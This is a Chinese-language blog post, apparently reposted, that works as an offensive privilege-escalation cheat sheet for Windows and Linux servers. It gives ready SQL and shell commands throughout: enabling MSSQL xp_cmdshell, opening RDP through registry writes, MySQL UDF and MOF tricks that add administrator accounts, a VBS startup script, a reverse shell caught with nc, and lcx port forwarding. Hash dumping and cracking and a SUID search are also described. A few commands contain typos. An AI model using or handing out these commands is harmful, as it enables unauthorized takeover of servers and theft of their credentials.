溢位提權
主要是通過Windows漏洞利用來獲取系統權限
常見的溢位提權
巴西烤肉
pr
步驟:
1、通過資訊搜集查看服務器打了哪些補丁
2、根據未打的補丁漏洞進行利用即可
破解hash提權
上傳pwdump.exe遠程獲取hash值
拿到lc5彩虹表破解
即可得到管理員密碼
需要管理員權限方可執行讀取hash操作
啟動項提權
前提寫入的目錄需要寫入權限
將批處理檔案上傳到開機啟動專案錄等待管理員重啟即可
資料庫提權
SQLserver資料庫提權
mysql資料庫提權
需要具備資料庫管理員權限才可以執行提權操作
msSQL提權
安裝組件
開啟3389
創建用戶
提升權限
完成
sa賬號的獲取,查看config.asp、conn.asp等檔案
msSQL安裝執行命令組件
安裝cmd_shell組件
exec sp_configure ‘show advanced options’, 1
go
reconfigure
go
exec sp_configure ‘xp_cmdshell’, 1
go
reconfigure
go
3389操作陳述句
開啟3389
exec
master.dbo.xp_regwrite’HKEY_LOCAL_MACHINE’,’SYSTEM\CurrentControlSet\Control\Terminal server’,’fDenyTSConnections’,’REG_DWORD’,0;--
關閉3389
exec
master.dbo.xp_regwrite’HKEY_LOCAL_MACHINE’,’SYSTEM\CurrentControlSet\Control\Terminal server’,’fDenyTSConnections’,’REG_DWORD’,1;--
洗掉cmd_shell組件
exec sp_configure ‘show advancer options’, 1
go
reconfigure
go
exec sp_configure xp_cmdshell; 0
go
reconfigure
go
mysql資料庫提權
udf提權
啟動項提權
maf提權
反鏈埠提權
udf提權
獲取到對方的mysql資料庫下的root賬號密碼
1、查看網站原始碼里面資料庫組態檔
(inc、conn、config.sql、common、data等)
2、查看資料庫安裝路徑下的user.myd(/data/mysql)
3、暴力破解mysql密碼,破解3306埠入侵
udf提權原理
通過root權限匯出udf.dll到系統目錄下,可以通過udf.dll呼叫執行cmd
c:\winnt\udf.dll 2000
c:\windows\udf.dll 2003
現在基本上win的服務器就這兩個匯出udf.dll
5.1以上版本需要匯出到mysql安裝目錄lib\plugin\
create function cmdshell returns string soname ‘udf.dll’
select cmdshell (‘net user abc abc /add’);
select cmdshell (‘net localgroup administrators abc /add’);
drop function cmdshell; 洗掉函式
啟動項提權
1、查看我們進入資料庫中有什么資料表
mysql>show tables;
默認情況下,test中沒有任何表的存在
以下為關鍵部分
2、在TEST資料庫下創建一個新的表
mysql>create table a (cmd text);
此時創建了一個新表,表名為a,表中只存放一個欄位名為cmd的text檔案
3、在表中插入內容
mysql>insert into a values (“set wshshell=createobject(“”wscript.shell””)”)
mysql>insert into a values (“a=wshshell.run (“”cmd.exe /c net user 1 1 /add””,0)”);
mysql>insert into a values (“b=wshshell.ru (“”cmd.exe /c net localgroup administrators 1 /add”,0)”);
注意,雙引號和括號以及后面的“0”一定要輸入,用這三條命令來建立一個VBS的腳本程式,
4、mysql>select * from a;
此時表中有三行資料,就是前面的VBS的腳本程式
5、輸出表為一個VBS的腳本檔案
mysql>select * from a into outfile “c://document//administrator//[開始]選單//程式//啟動//a.vbs”;
6、重啟
mof提權
第一種方法:
上傳mof.php
輸入相關資訊,執行命令,提權
第二種方法:
上傳x.mof
使用select命令匯出到正確位置
select load_file(‘c:/wmpub/nullevt.mof’) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’
允許外部地址使用root用戶連接的SQL陳述句
grant all privileges on *.* to ‘root’@’%’ identified by ‘root’ with grant option;
反鏈埠提權
利用mysql客戶端工具連接mysql服務器,然后執行以下操作
1、執行命令
mysql.exe –h 172.16.10.11 –uroot –p
enter password:
mysql>\.c”\mysql.txt
mysql>select backshell(“yourip”,2010);
2、本地監聽反彈的埠
nc.exe –vv –l –p 2010
成功后,會獲得一個system權限的cmdshell
內網埠轉發
內網主機輸入命令
lcx.exe –slave 外網ip 外網埠 內網ip 內網埠
lcx.exe –slave 200.1.1.1 1111 192.168.1.2 3389
外網主機輸入命令
lcx.exe –listen 111 1311
開啟3389
使用
批處理檔案開3389
使用sql陳述句開3389
使用exe開3389
使用vb開3389
一些命令的利用
type E:\wwwroot\web.config 查看檔案內容
cacls命令
/T:更改當前目錄及其有子目錄中指定的acl
/E:編輯acl而不替換
/C:在出現拒絕訪問錯誤的時候繼續
/G Userver:perm:賦了指定用戶訪問權限,perm代表不同級別的訪問權限,其值可以是R(讀),W(寫),C(該),F(安全控制)等
/R user:撤銷指定用戶的訪問權限,注意該引數僅在與“/E”一起使用的時候有效
要修改一個檔案的權限必要條件
要有USERS組的完全控制權限
cmd權限
Linux提權
內核溢位提權
mysql ndf提權
利用SUID提權
利用環境變數,劫持該勸的程式提權
內核溢位提權
查看內核
uname –r
反彈shell執行命令
上傳exp
編譯
執行
根據內核版本查找對應的漏洞
收集exp
可以從www.exploit-db.com查找漏洞利用
mysql udf提權
上傳庫檔案
執行庫檔案創建命令執行函式
利用SUID提權
尋找系統里可以用的SUID檔案來提權
$find /-perm –u=s –type f 2>/dev/null
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/57034.html
標籤:其他